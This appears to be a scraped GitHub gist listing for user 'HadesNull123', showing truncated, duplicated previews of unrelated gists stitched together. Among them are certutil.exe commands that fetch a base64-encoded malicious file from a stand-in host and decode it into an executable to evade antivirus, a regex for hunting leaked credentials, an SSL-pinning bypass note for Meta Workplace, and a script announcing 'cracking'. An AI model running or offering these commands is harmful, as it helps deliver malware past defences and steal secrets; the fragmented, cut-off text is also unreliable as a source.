HadesNull HadesNull123

## CertUtil.exe Abuse to Download Malware While Bypassing AV + Regsvr32.exe Dll Injection + CSV Injection
# certutil.exe bypass av on download + base64 Decoding

#first base64 encoding the malicious file so that to an edge device it just appears as harmless text.
#Then once the text file is downloaded, the "certutil.exe -decode"  command can be used to decode the base64 encoded file
#into the executable.   https://www.browserling.com/tools/file-to-base64
#This is illustrated in Xavier Mertens handler diary.
# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/

C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
C:\Temp>certutil.exe -decode bad.txt bad.exe

## Generic keys
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

## twitter-register.py
#! /bin/python

import json
import random
import re
import string
import time
import urllib.parse
from threading import Thread
from time import sleep, time_ns

## tiktok_subdomains.txt
activity.musical.ly
activity.tiktok.com
ads.tiktok.com
analytics.tiktok.com
api15-h2-eagle.tiktokv.com
api15-h2.tiktokv.com
api16-core-c-alisg.tiktokv.com
api16-core-c-useast1a.musical.ly
api16-core-c-useast2a.musical.ly
api16-core-c-useast2a.tiktokv.com

## wokplace-ssl-pinning-bypass.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                HadesNull123
                / wokplace-ssl-pinning-bypass.md
            
            
              Created
              September 9, 2023 04:10
                — forked from xdavidhu/wokplace-ssl-pinning-bypass.md
            
              
                Bypassing SSL Pinning in Facebook/Meta Workplace (Android)
              
          
    Tested on Workplace for Android version 362.0.0.29.109. This approach might work in other Facebook/Meta applications.
Thank you Imre Rad for helping me analyze the binary.
How does it work?

The Workplace Android app uses the Fizz open source TLS-1.3 library to communicate with the backend APIs.
This library is written in C++, and is compiled to native code. It is running as a native library attached to the Android app.
The certificate verification is implemented in fizz/client/ClientProtocol.cpp, on line 1944.
The easiest way to bypass this check is to patch the if (state.verifier()) { check on line 1942.

  
## acu.sh
#!/usr/bin/env bash

# set -ex

Echo_c() {
  echo "\033[1;33m$1\033[0m"
}

check() {
  Echo_c " Starting cracking"

## UNLICENSE
This is free and unencumbered software released into the public domain.

Anyone is free to copy, modify, publish, use, compile, sell, or
distribute this software, either in source code form or as a compiled
binary, for any purpose, commercial or non-commercial, and by any
means.

In jurisdictions that recognize copyright laws, the author or authors
of this software dedicate any and all copyright interest in the
software to the public domain. We make this dedication for the benefit

## yt1080.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                HadesNull123
                / yt1080.md
            
            
              Created
              August 29, 2020 16:16
                — forked from lelandbatey/yt1080.md
            
              
                YouTube 1080p Download Script
              
          
    YouTube 1080p Downloader

The Problem

It used to be you could directly download any YouTube video in any quality you wanted, as a single .mp4 file. However, around a year ago, YouTube switched from the "single file stream", to "DASH" streaming, which streams the video and the audio to you as two separate streams, which are played in sync with each other in the YouTube player.
It's still possible to download YouTube videos as a single file, but YouTube only offers that for qualities up to 720p. So you can't download "single file stream" videos in 1080p or higher.

  
## Liberal Regex Pattern for Web URLs
The regex patterns in this gist are intended only to match web URLs -- http,
https, and naked domains like "example.com". For a pattern that attempts to
match all URLs, regardless of protocol, see: https://gist.github.com/gruber/249502


# Single-line version:

(?i)\b((?:https?:(?:/{1,3}|[a-z0-9%])|[a-z0-9.\-]+[.](?:com|net|org|edu|gov|mil|aero|asia|biz|cat|coop|info|int|jobs|mobi|museum|name|post|pro|tel|travel|xxx|ac|ad|ae|af|ag|ai|al|am|an|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cs|cu|cv|cx|cy|cz|dd|de|dj|dk|dm|do|dz|ec|ee|eg|eh|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|s
	# certutil.exe bypass av on download + base64 Decoding

	#first base64 encoding the malicious file so that to an edge device it just appears as harmless text.
	#Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file
	#into the executable. https://www.browserling.com/tools/file-to-base64
	#This is illustrated in Xavier Mertens handler diary.
	# https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/

	C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt
	C:\Temp>certutil.exe -decode bad.txt bad.exe
	#! /bin/python

	import json
	import random
	import re
	import string
	import time
	import urllib.parse
	from threading import Thread
	from time import sleep, time_ns
	activity.musical.ly
	activity.tiktok.com
	ads.tiktok.com
	analytics.tiktok.com
	api15-h2-eagle.tiktokv.com
	api15-h2.tiktokv.com
	api16-core-c-alisg.tiktokv.com
	api16-core-c-useast1a.musical.ly
	api16-core-c-useast2a.musical.ly
	api16-core-c-useast2a.tiktokv.com
	#!/usr/bin/env bash

	# set -ex

	Echo_c() {
	echo "\033[1;33m$1\033[0m"
	}

	check() {
	Echo_c " Starting cracking"
	This is free and unencumbered software released into the public domain.

	Anyone is free to copy, modify, publish, use, compile, sell, or
	distribute this software, either in source code form or as a compiled
	binary, for any purpose, commercial or non-commercial, and by any
	means.

	In jurisdictions that recognize copyright laws, the author or authors
	of this software dedicate any and all copyright interest in the
	software to the public domain. We make this dedication for the benefit
	The regex patterns in this gist are intended only to match web URLs -- http,
	https, and naked domains like "example.com". For a pattern that attempts to
	match all URLs, regardless of protocol, see: https://gist.github.com/gruber/249502


	# Single-line version:

	(?i)\b((?:https?:(?:/{1,3}\|[a-z0-9%])\|[a-z0-9.\-]+[.](?:com\|net\|org\|edu\|gov\|mil\|aero\|asia\|biz\|cat\|coop\|info\|int\|jobs\|mobi\|museum\|name\|post\|pro\|tel\|travel\|xxx\|ac\|ad\|ae\|af\|ag\|ai\|al\|am\|an\|ao\|aq\|ar\|as\|at\|au\|aw\|ax\|az\|ba\|bb\|bd\|be\|bf\|bg\|bh\|bi\|bj\|bm\|bn\|bo\|br\|bs\|bt\|bv\|bw\|by\|bz\|ca\|cc\|cd\|cf\|cg\|ch\|ci\|ck\|cl\|cm\|cn\|co\|cr\|cs\|cu\|cv\|cx\|cy\|cz\|dd\|de\|dj\|dk\|dm\|do\|dz\|ec\|ee\|eg\|eh\|er\|es\|et\|eu\|fi\|fj\|fk\|fm\|fo\|fr\|ga\|gb\|gd\|ge\|gf\|gg\|gh\|gi\|gl\|gm\|gn\|gp\|gq\|gr\|gs\|gt\|gu\|gw\|gy\|hk\|hm\|hn\|hr\|ht\|hu\|id\|ie\|il\|im\|in\|io\|iq\|ir\|is\|it\|je\|jm\|jo\|jp\|ke\|kg\|kh\|ki\|km\|kn\|kp\|kr\|kw\|ky\|kz\|la\|lb\|lc\|li\|lk\|lr\|ls\|lt\|lu\|lv\|ly\|ma\|mc\|md\|me\|mg\|mh\|mk\|ml\|mm\|mn\|mo\|mp\|mq\|mr\|ms\|mt\|mu\|mv\|mw\|mx\|my\|mz\|na\|nc\|ne\|nf\|ng\|ni\|nl\|no\|np\|nr\|nu\|nz\|om\|pa\|pe\|pf\|pg\|ph\|pk\|pl\|pm\|pn\|pr\|ps\|pt\|pw\|py\|qa\|re\|ro\|rs\|ru\|rw\|sa\|sb\|sc\|sd\|se\|sg\|sh\|si\|s